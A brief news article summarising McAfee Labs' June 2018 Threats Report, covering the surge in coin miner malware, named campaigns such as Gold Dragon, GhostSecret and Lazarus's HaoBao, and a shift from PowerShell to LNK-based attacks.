Criminals Avoid Detection Using Old Campaigns

Written by

McAfee Labs has released its Threats Report June 2018, in which it highlights the notable investigative research and threat trend statistics gathered from Q1 2018. A key finding was a significantly high spike in the total coin miner malware, which rose by 629% in Q1 to more than 2.9 million samples.

Additional findings included in this report are the complex nation-state threat campaigns – driven by financially and politically motivated criminals – that had targeted users and enterprise systems worldwide.

“We have seen continued expansion of this criminal endeavor during the quarter,” the report state. “The goal of the perpetrators is to monetize their criminal activity by expending the least amount of effort, using the fewest middlemen, and executing their crimes in the shortest time possible and with the least risk of discovery.”

Bad actors continue to grow more innovative and demonstrate an impressive level of technical agility, improving on several of the attack schemes that emerged at the end of 2017. With some technical creativity, these actors have discovered new ways to avoid detection and mitigation.

Among the key campaigns were Gold Dragon, Lazarus and the cryptocurrency campaigns GhostSecret and Bankshot. “Gold Dragon is a particularly slippery instance of fileless malware because it is designed to be evasive, checking on processes related to antimalware solutions,” the report stated. 

Researchers believe the currently active and extremely complex campaign, GhostSecret, is associated with the international cybercrime group known as Hidden Cobra. The campaign, which “employs a series of implants to appropriate data from infected systems, is also characterized by its ability to evade detection and throw forensic investigators off its trail.”

The Lazarus cybercrime ring returned to target global financial organizations and Bitcoin users with a new Bitcoin-stealing phishing campaign dubbed HaoBao.

Overall, the June report highlights the efforts on the part of bad actors who strive to do better. To that end, they’ve shifted from PowerShell to LNK. “In 2017 we saw a surge in the exploitation of benign technologies for malicious purposes, such as PowerShell. In Q1 2018, we saw malicious actors turn away from PowerShell exploits, which dropped 77%, and take advantage of LNK capabilities. New LNK malware rose 59% in Q1."

What’s hot on Infosecurity Magazine?